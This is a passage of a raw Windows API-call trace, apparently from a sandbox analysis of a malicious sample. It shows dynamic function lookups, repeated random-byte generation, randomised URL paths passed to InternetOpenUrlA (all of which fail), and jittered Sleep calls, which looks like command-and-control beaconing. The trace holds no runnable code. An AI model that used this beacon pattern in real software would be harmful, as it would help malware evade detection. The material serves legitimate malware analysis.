0x7ffc5bcc36b0 [0222.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0222.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0222.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0222.779] GetProcessHeap () returned 0x440000 [0222.779] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473980 [0222.779] lstrcpyA (in: lpString1=0x473980, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0222.780] lstrcatA (in: lpString1="\x81\x03", lpString2="/8Kudoqfh80v29foP9H4i/GkfPfkuhmCd5Xgtvlhrdurwxgxovbrc2171/xlfy8fjpvvlwQyhbiR9f/" | out: lpString1="\x81\x03/8Kudoqfh80v29foP9H4i/GkfPfkuhmCd5Xgtvlhrdurwxgxovbrc2171/xlfy8fjpvvlwQyhbiR9f/") returned="\x81\x03/8Kudoqfh80v29foP9H4i/GkfPfkuhmCd5Xgtvlhrdurwxgxovbrc2171/xlfy8fjpvvlwQyhbiR9f/" [0222.780] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0222.780] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/8Kudoqfh80v29foP9H4i/GkfPfkuhmCd5Xgtvlhrdurwxgxovbrc2171/xlfy8fjpvvlwQyhbiR9f/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0222.780] GetProcessHeap () returned 0x440000 [0222.780] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473980 | out: hHeap=0x440000) returned 1 [0222.780] GetProcessHeap () returned 0x440000 [0222.780] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a16800 | out: hHeap=0x440000) returned 1 [0222.780] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0222.780] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0222.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0222.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0222.781] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0222.781] Sleep (dwMilliseconds=0x1ca15) [0223.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0223.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0223.136] GetProcessHeap () returned 0x440000 [0223.136] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0223.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0223.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x16, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0223.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0223.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0223.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0223.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0223.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0223.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b267, cbBuffer=0x1a, dwFlags=0x2 | out: pbBuffer=0x3a1b267) returned 0x0 [0223.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0223.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0223.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.142] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.142] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0223.142] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.142] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0223.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0223.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0223.145] GetProcessHeap () returned 0x440000 [0223.145] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0223.145] lstrcpyA (in: lpString1=0x473140, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0223.145] lstrcatA (in: lpString1="\x81\x03", lpString2="/3zvutmsg5w0pwyq7k0pfn/Em1chf7i1dve8jnDfc6nn39qk/" | out: lpString1="\x81\x03/3zvutmsg5w0pwyq7k0pfn/Em1chf7i1dve8jnDfc6nn39qk/") returned="\x81\x03/3zvutmsg5w0pwyq7k0pfn/Em1chf7i1dve8jnDfc6nn39qk/" [0223.145] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0223.145] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/3zvutmsg5w0pwyq7k0pfn/Em1chf7i1dve8jnDfc6nn39qk/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0223.145] GetProcessHeap () returned 0x440000 [0223.147] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0223.147] GetProcessHeap () returned 0x440000 [0223.147] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0223.147] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0223.147] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0223.147] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0223.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0223.147] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0223.148] Sleep (dwMilliseconds=0x1a866) [0225.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0225.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0225.078] GetProcessHeap () returned 0x440000 [0225.078] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a16800 [0225.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0225.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16801, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x3a16801) returned 0x0 [0225.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0225.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.436] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0225.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0225.437] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0225.438] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0225.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.439] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0225.440] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.441] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.441] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0225.442] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0225.442] BCryptGenRandom (in: 